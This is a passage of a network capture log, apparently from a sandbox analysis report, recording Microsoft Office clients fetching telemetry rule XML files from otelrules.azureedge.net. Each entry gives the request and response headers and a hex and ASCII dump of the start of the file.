                                                                                                                                                                                          2024-11-23 16:45:04 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          98192.168.2.54986113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:04 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:04 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1393
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                          x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164504Z-178bfbc474bscnbchC1NYCe7eg00000004z00000000026tz
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          99192.168.2.54986313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:04 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:04 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1393
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                          x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164504Z-178bfbc474bscnbchC1NYCe7eg00000004wg000000008fms
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          100192.168.2.54986413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:04 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:04 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1356
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                          x-ms-request-id: 923400a1-601e-005c-187f-3bf06f000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164504Z-174c587ffdftv9hphC1TEBm29w0000000360000000004usx
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:04 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          101192.168.2.54986913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:06 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:06 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1358
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE6431446"
                                                                                                                                                                                          x-ms-request-id: 161730be-201e-0051-3520-3d7340000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164506Z-178bfbc474btvfdfhC1NYCa2en00000004w000000000467c
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:06 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          102192.168.2.54986813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:06 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:06 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1395
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                          x-ms-request-id: 8d0ecd0b-301e-0020-617e-3b6299000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164506Z-174c587ffdftjz9shC1TEBsh98000000031g00000000c7aw
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          103192.168.2.54987013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:06 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:06 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1395
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                          x-ms-request-id: aaf9eac1-201e-0000-4977-3ba537000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164506Z-174c587ffdf59vqchC1TEByk6800000003c0000000007xb6
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          104192.168.2.54987113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:06 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:06 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1358
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                          x-ms-request-id: 45336a67-c01e-0014-2f6a-3ca6a3000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164506Z-174c587ffdftjz9shC1TEBsh98000000032000000000b4kn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:07 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          105192.168.2.54987213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:06 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:06 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1389
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                          x-ms-request-id: f421f7ab-401e-0029-142f-3c9b43000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164506Z-178bfbc474bh5zbqhC1NYCkdug00000004rg000000002zrk
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:07 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          106192.168.2.54987413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:08 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:09 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1405
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                          x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164509Z-15b8b599d889gj5whC1TEBfyk00000000330000000004h8v
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:09 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          107192.168.2.54987313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:08 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
